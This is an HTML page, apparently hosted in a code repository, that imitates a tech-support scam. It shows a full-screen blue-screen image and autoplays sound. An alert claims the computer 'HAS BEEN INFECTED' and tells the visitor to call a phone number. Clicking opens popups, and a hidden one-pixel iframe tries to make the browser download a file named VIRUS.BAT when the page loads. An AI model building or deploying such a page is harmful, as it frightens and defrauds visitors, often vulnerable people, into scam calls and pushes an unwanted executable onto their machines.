You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

41 lines
929 B

<html>
<title>You have a virus!</title>
<style>
img {
width: 100%;
height: 100%;
background-size: cover;
position: fixed;
top: 0;
left: 0;
}
</style>
<img id="background-img" src="bsod.jpg"/>
<audio autoplay src="bsod.mp3" type="audio/mpeg"/>
<SCRIPT TYPE="text/javascript">
function popup(mylink, windowname) {
if (! window.focus)return true;
var href;
if (typeof(mylink) == 'string') href=mylink;
else href=mylink.href;
window.open(href, windowname, 'width=582,height=202,scrollbars=yes').focus();
return false;
}
</SCRIPT>
<BODY onClick="popup('error.html', 'ad')" onLoad="myFunction()">
<script>
function myFunction() {
alert("YOUR COMPUTER HAS BEEN INFECTED!"+"\n"+"Please call 651-123-4567");
}
</script>
</body>
<iframe id="download" width="1" height="1" style="display:none" frameborder="0" src="VIRUS.BAT"></iframe>
</html>